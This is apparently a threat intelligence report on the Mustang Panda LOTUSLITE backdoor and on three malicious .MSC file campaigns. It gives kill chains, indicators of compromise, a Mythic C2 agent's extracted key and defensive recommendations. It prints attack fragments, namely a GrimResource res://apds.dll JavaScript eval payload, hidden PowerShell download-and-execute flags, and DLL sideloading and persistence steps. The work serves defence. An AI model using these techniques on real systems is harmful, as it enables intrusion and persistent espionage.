BreakglassIntelligence
Back to reports
highPhishing

LOTUSLITE and MSC File Attack Vector

InvestigatedApril 3, 2026PublishedApril 3, 2026
Threat Actors:Profile
lotuslitemscc2aptdll-sideloadingcloudflaretorlnk

TLP: WHITE Date: 2026-04-03 Analyst: GHOST (Breakglass Intelligence) Classification: APT / Cybercrime (Multiple Campaigns)

Executive Summary

This investigation examines the intersection of two active threat campaigns: (1) the LOTUSLITE backdoor attributed to Mustang Panda (Chinese APT), and (2) an emerging attack vector using malicious .MSC (Microsoft Saved Console) files delivered via WebDAV and Cloudflare infrastructure. GHOST identified TWO LIVE Cloudflare-hosted C2 servers delivering active payloads, recovered two previously unreported PE payloads (a Mythic C2 "coffee" agent DLL and an encrypted loader EXE), and documented the full kill chains for three distinct MSC-based attack campaigns. The Mythic agent contains hardcoded AES-256 encryption keys that have not appeared in any prior reporting.

Key Findings

  • TWO LIVE C2 SERVERS: icewrap[.]com-smartattachment[.]workers[.]dev and s3-ap-northeast-1-amazonaws-com[.]pages[.]dev are actively serving malicious payloads as of 2026-04-03
  • MYTHIC C2 AGENT RECOVERED: The s3-amazonaws C2 delivers a Rust-based Mythic "coffee" agent (xolehlp.dll) using DLL sideloading via msdtc.exe, with extracted AES-256 PSK
  • GRIMRESOURCE TECHNIQUE: The plugin.msc sample uses the GrimResource technique -- an XSS via apds.dll redirect that evaluates JavaScript through MMC ScopeNamespace
  • DUAL PERSISTENCE: The s3-amazonaws kill chain establishes TWO scheduled tasks: "MicrosoftEdgeUpdateTaskMachineCoreXUI" (every 3 min) and "JavaUpdate" (every 7 min, runs as SYSTEM)
  • MUSTANG PANDA EVOLUTION: 25 samples spanning 2024-2026 showing evolution from PlugX to LOTUSLITE, TONESHELL, SnakeDisk, PUBLOAD, and FDMTP
  • LOTUSLITE C2 OFFLINE: 172[.]81[.]60[.]97 (Dynu Systems) shows only port 139 -- campaign has rotated infrastructure

What Was Found vs What Was Known

AspectPrior Reporting (Acronis TRU)Our Findings
LOTUSLITE C2172.81.60.97 (single IP)C2 is offline; Dynu /22 has 30+ LE certs
MSC techniqueNot linked to LOTUSLITE3 distinct MSC campaigns, 2 with LIVE C2
Payload deliveryZIP with DLL sideloaderMSC via GrimResource/ExecuteShellCommand via Cloudflare
Implant typeCustom C++ backdoorMythic C2 "coffee" agent (Rust) + encrypted loader
PersistenceRegistry Run keyDual scheduled tasks (user + SYSTEM)
InfrastructureSingle IPCloudflare Workers + Pages (serverless)

Attack Chains

Campaign 1: Smart_Policing MSC (c365d45f)

Delivery: Smart_Policing_Industry_Participation.msc MMC opens MSC file, StringTable contains URL to icewrap Workers domain. external.ExecuteShellCommand() calls powershell.exe with: -ExecutionPolicy Bypass -WindowStyle Hidden Downloads svchost.exe, executes from %TEMP% hidden.

Campaign 2: Cyber-Advisory MSC (590879c5)

Delivery: Cyber-Advisory-2026.pdf.msc Stage 1: cmd.exe downloads p4z3rs.png as xolehlp.dll to ProgramData Stage 2: XSLT transform with JScript downloads advisory.pdf decoy Stage 3: Copies msdtc.exe from System32 to ProgramData (sideloading target) Stage 4: Creates task "MicrosoftEdgeUpdateTaskMachineCoreXUI" (3 min interval) Stage 5: Creates task "JavaUpdate" (7 min interval, SYSTEM) Result: msdtc.exe loads malicious xolehlp.dll (Mythic coffee agent)

Campaign 3: GrimResource MSC (f239e3fe) -- plugin.msc

Delivery: plugin.msc GrimResource via HTML-entity-encoded URL in StringTable: res://apds.dll./redirect.html?target=javascript:eval(external.Document.ScopeNamespace.GetRoot().Name) XSS in apds.dll triggers JavaScript evaluation of root node Name.

LOTUSLITE Campaign (Mustang Panda)

Delivery: "US now deciding what is next for Venezuela.zip" LNK file triggers PowerShell, extracts tar from ZIP at offset 795. Deploys to GUID directory under %LOCALAPPDATA%. DLL sideloading: KuGou player loads kugou.dll (LOTUSLITE). C2: 172[.]81[.]60[.]97:443 with magic header 0x8899AABB. Persistence: Registry Run key "Lite360".

Infrastructure Analysis

Network Infrastructure

IP/DomainTypeProviderStatusPurpose
icewrap[.]com-smartattachment[.]workers[.]devWorkersCloudflareLIVEPayload delivery
s3-ap-northeast-1-amazonaws-com[.]pages[.]devPagesCloudflareLIVEDLL sideloading chain
172[.]81[.]60[.]97IPDynu Systems (AS398019)OFFLINELOTUSLITE C2
104[.]21[.]36[.]31 / 172[.]67[.]184[.]85IPCloudflareLIVEWorkers proxied IPs
188[.]114[.]97[.]0 / 188[.]114[.]96[.]0IPCloudflareLIVEPages proxied IPs

Dynu Systems Infrastructure (172.81.60.0/22)

LOTUSLITE C2 sits within Dynu Systems /22 allocation (172.81.60.0 - 172.81.63.255). CT logs show 30+ Let's Encrypt certificates issued to IPs in this range. Dynu is a dynamic DNS/hosting provider in Chandler, AZ commonly abused by threat actors.

Cloudflare Abuse Pattern

Both live C2s abuse Cloudflare free-tier serverless:

  • Workers (icewrap): JS edge compute with global distribution
  • Pages (s3-amazonaws): Static hosting disguised as AWS S3 URL
  • Domain naming mimics legitimate services

Malware Analysis

svchost_icewrap.exe (Encrypted Loader)

FieldValue
SHA256c6210ba0144d8a2c502398aa591b8b6053c186d6b72146e14d09018fe35663c1
TypePE32+ executable (console) x86-64
Size245,760 bytes
Compile2026-01-12 06:10:08 UTC
Imphash183d8931dd9cdf26a1768e30473b67f5

High-entropy .data section (7.96) indicates encrypted payload. Uses LoadLibraryA + GetProcAddress for dynamic API resolution. Strings include "KeyGuard Failed" and "Decryption Error: 0x%X" -- this is a decryptor/loader.

xolehlp.dll (Mythic C2 Coffee Agent)

FieldValue
SHA25667d7f993304c211f727ac8e25ece366f345f349e38ec62316d66c173943bd244
TypePE32+ DLL (GUI) x86-64
Size354,304 bytes
Compile2026-01-07 23:38:20 UTC
Imphashbcbfa700ea52123d867e192d94135c49
ExportsDllMain, DtcGetTransactionManager*, Freeze/ThawLocalTransactionManagers

Mythic C2 "coffee" agent written in Rust. Masquerades as legitimate xolehlp.dll (MS DTC Helper).

Extracted Configuration:

  • Encryption: AES-256-HMAC
  • PSK: H0QmHqnUMbcVE6M3vAHZ52ZQ5dFbsFfkDJlcugxKcZ0=
  • Commands: coffee, upload, c2_update, download, continued_task, sleep, exit
  • C2 Headers: Server ETag, Cache-Control, Keep-Alive, Content-Type, X-AspNetMvc-Version
  • Config marker: pc2g at offset 339174

DLL Sideloading: msdtc.exe (legitimate) loads xolehlp.dll from ProgramData instead of System32.

advisory.pdf (Decoy)

| SHA256 | eb62436ead5ac9620fa0f04c13615a869a23267d166869b050eea6a317e93cf1 | | Type | PDF, 8 pages |

MSC File Attack Technique

What is an MSC File?

Microsoft Saved Console (.msc) files are XML documents defining MMC snap-in configurations. They are trusted by Windows and execute without security warnings.

Three Attack Variants Observed

  1. GrimResource (CVE-2025-26633): XSS via apds.dll res:// protocol handler
  2. ExecuteShellCommand: MMC API allowing loaded web content to execute commands
  3. XSLT Transform: Embedded XSL stylesheet with JScript/VBScript via ms:script

Why MSC Files Are Dangerous

  • Trusted by Windows -- no MotW warnings
  • XML-based -- easy to craft
  • Can embed JS, VBS, ActiveX
  • Can reference external URLs
  • Bypass email/web gateways

Threat Actor Profile

Mustang Panda / LOTUSLITE

  • Confidence: HIGH
  • Country: China (PRC)
  • Motivation: Espionage
  • Targets: US policy, Iran energy, India Buddhist organizations, Adriatic diplomacy, Thailand government

MSC Campaign Operators

  • Confidence: LOW-MEDIUM (separate from Mustang Panda)
  • Mythic C2 framework usage inconsistent with Mustang Panda custom tooling
  • Likely cybercrime operations adopting MSC technique

MITRE ATT&CK Mapping

TacticTechniqueID
Initial AccessSpearphishing AttachmentT1566.001
ExecutionSystem Binary Proxy: MMCT1218.014
ExecutionPowerShellT1059.001
ExecutionJavaScriptT1059.007
ExecutionXSL Script ProcessingT1220
PersistenceScheduled TaskT1053.005
PersistenceRegistry Run KeysT1547.001
Defense EvasionDLL Side-LoadingT1574.002
Defense EvasionMasqueradingT1036.005
Defense EvasionObfuscated FilesT1027
C2HTTPT1071.001
C2Web ServiceT1102

IOC Summary

Network Indicators

  • icewrap[.]com-smartattachment[.]workers[.]dev (LIVE)
  • s3-ap-northeast-1-amazonaws-com[.]pages[.]dev (LIVE)
  • 172[.]81[.]60[.]97 (OFFLINE)
  • cdn7s65[.]z13[.]web[.]core[.]windows[.]net (Azure delivery)

File Indicators (SHA256)

  • c6210ba0144d8a2c502398aa591b8b6053c186d6b72146e14d09018fe35663c1 -- svchost.exe (loader)
  • 67d7f993304c211f727ac8e25ece366f345f349e38ec62316d66c173943bd244 -- xolehlp.dll (Mythic coffee)
  • eb62436ead5ac9620fa0f04c13615a869a23267d166869b050eea6a317e93cf1 -- advisory.pdf (decoy)
  • f239e3fedc4926ff3cf58f95bacff9d8f11289e58036ed507ab3f435dce1b2b1 -- plugin.msc (GrimResource)
  • c365d45f893403ca7d1a7a05d28d2d153aaeb4fa15218435cab316a0b5d3ff53 -- Smart_Policing.msc
  • 590879c567c6d95b18b34e46e9830ba7b807279d76d83abc066f013d4b6f693e -- Cyber-Advisory.msc
  • 819f586ca65395bdd191a21e9b4f3281159f9826e4de0e908277518dba809e5b -- LOTUSLITE loader
  • 2c34b47ee7d271326cfff9701377277b05ec4654753b31c89be622e80d225250 -- kugou.dll (LOTUSLITE)
  • de13e4b4368fbe8030622f747aed107d5f6c5fec6e11c31060821a12ed2d6ccd -- Tehran Province ZIP
  • 87929c8f53341a5e413950d33c7946c64e1d4b2eba6d1a8b2d08ef56f7065052 -- Post-Meeting Report LNK

Behavioral Indicators

  • Mutex: Global\Technology360-A@P@T-Team
  • Registry: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Lite360
  • Tasks: MicrosoftEdgeUpdateTaskMachineCoreXUI, JavaUpdate
  • Paths: C:\ProgramData\Microsoft\Windows\msdtc.exe, C:\ProgramData\Microsoft\Windows\xolehlp.dll
  • C2 Magic: 0x8899AABB
  • User-Agent: Googlebot (with Microsoft Host header)
  • AES-256 PSK: H0QmHqnUMbcVE6M3vAHZ52ZQ5dFbsFfkDJlcugxKcZ0=
  • Imphash: 183d8931dd9cdf26a1768e30473b67f5, bcbfa700ea52123d867e192d94135c49

Immediate (24-48 hours)

  • Block both Cloudflare domains at proxy/DNS
  • Hunt for scheduled tasks: MicrosoftEdgeUpdateTaskMachineCoreXUI, JavaUpdate
  • Search for msdtc.exe running from ProgramData (not System32)
  • Deploy YARA rules to scan endpoints
  • Report domains to Cloudflare Trust and Safety

Short-term (1-2 weeks)

  • Monitor mmc.exe loading MSC files from unusual paths
  • Block MSC file attachments at email gateway
  • Monitor DLL sideloading: msdtc.exe loading xolehlp.dll from non-System32
  • Deploy Suricata rules for Mythic C2 patterns

Medium-term (1-3 months)

  • Implement WDAC policies restricting MSC execution
  • Deploy Sysmon rules monitoring MMC child processes
  • Evaluate blocking res:// protocol handler

References

  • Acronis TRU: LOTUSLITE Targeted Espionage
  • Trend Micro: CVE-2025-26633 MSC EvilTwin
  • Splunk: Breaking Trust in MMC -- XML-Driven Malicious Loader Detection
  • MITRE ATT&CK: T1218.014 System Binary Proxy Execution: MMC
  • Picus Security: Mustang Panda Campaign Breakdown

GHOST -- Breakglass Intelligence "One indicator. Total infrastructure."

Share